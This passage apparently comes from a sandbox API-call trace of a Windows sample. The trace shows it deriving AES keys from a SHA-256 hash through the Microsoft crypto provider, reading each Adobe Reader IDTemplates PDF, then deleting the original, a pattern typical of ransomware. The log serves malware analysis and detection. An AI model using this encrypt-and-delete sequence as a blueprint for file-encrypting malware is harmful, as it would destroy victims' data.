phHash=0x3269740) returned 1 [0199.561] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.561] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.561] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10596 [0199.561] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.567] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0199.567] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.567] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.568] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\defaultid.pdf")) returned 1 [0199.570] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0199.570] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.571] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.571] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.571] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.571] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x43b5 [0199.571] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.582] CryptDestroyHash (hHash=0x284d668) returned 1 [0199.582] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.582] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.583] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\adobeid.pdf")) returned 1 [0199.689] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.689] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.689] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.689] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.689] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3e95 [0199.690] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.722] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0199.722] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.722] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.723] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\defaultid.pdf")) returned 1 [0199.725] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0199.726] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.726] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.726] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.726] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.726] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16097 [0199.726] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.733] CryptDestroyHash (hHash=0x284d668) returned 1 [0199.733] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.733] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.734] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\adobeid.pdf")) returned 1 [0199.814] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.814] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.814] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.814] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.814] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15db2 [0199.814] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.858] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0199.858] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.858] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.859] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\defaultid.pdf")) returned 1 [0199.861] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0199.862] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.862] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.863] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.863] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.863] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10913 [0199.863] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.869] CryptDestroyHash (hHash=0x284d668) returned 1 [0199.869] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.869] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.870] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\adobeid.pdf")) returned 1 [0199.949] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.949] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.949] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.949] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.949] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x103f8 [0199.949] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.954] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0199.954] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.954] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.956] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\defaultid.pdf")) returned 1 [0199.957] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0199.958] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.958] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.958] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.958] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.958] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5944 [0199.958] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.962] CryptDestroyHash (hHash=0x284d668) returned 1 [0199.962] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.962] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.963] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\adobeid.pdf")) returned 1 [0200.076] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.076] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.076] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.076] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.076] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5404 [0200.076] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0200.081] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0200.081] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0200.081] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0200.082] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\defaultid.pdf")) returned 1 [0200.084] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0200.084] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.084] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.084] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.084] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.084] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x592a [0200.084] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0200.089] CryptDestroyHash (hHash=0x284d668) returned 1 [0200.089] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0200.089] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0200.090] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\adobeid.pdf")) returned 1 [0200.198] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.198] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.198] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.198] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.198] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5416 [0200.198] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0200.202] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0200.202] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0200.202] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0200.203] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\defaultid.pdf")) returned 1 [0200.205] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0200.205] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.206] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.206] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.206] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.206] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10929 [0200.206] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0200.359] CryptDestroyHash (hHash=0x284d668) returned 1 [0200.359] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0200.359] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0200.360] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\adobeid.pdf")) returned 1 [0200.510] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.510] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.510] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.510] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.510] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10405 [0200.511] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0200.516] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0200.516] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0200.516] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0200.517] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\defaultid.pdf")) returned 1 [0200.519] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0200.519] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.520] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.520] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.520] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.520] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10956 [0200.520] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0200.562] CryptDestroyHash (hHash=0x284d668) returned 1 [0200.562] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0200.562] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0200.563] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\adobeid.pdf")) returned 1 [0200.895] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.896] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.896] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.896] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.896] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1043a [0200.896] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0200.902] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0200.902] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0200.902] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0200.903] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\defaultid.pdf")) returned 1 [0200.918] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0200.918] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0200.919] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0200.919] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.919] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0200.919] GetFileSize (in: hFile=0x600, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26ca2 [0200.919] ReadFile (in: hFile=0x600, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.307] CryptDestroyHash (hHash=0x284d668) returned 1 [0201.307] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.307] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.308] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\adobeid.pdf")) returned 1 [0201.460] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.460] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.460] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.460] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.460] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x25d4a [0201.460] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.484] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0201.484] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.484] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.486] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\defaultid.pdf")) returned 1 [0201.487] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0201.488] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.488] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.488] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.488] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.488] GetFileSize (in: hFile=0x600, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11426 [0201.488] ReadFile (in: hFile=0x600, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.503] CryptDestroyHash (hHash=0x284d668) returned 1 [0201.503] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.503] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.504] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\adobeid.pdf")) returned 1 [0201.507] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.507] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.507] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.507] 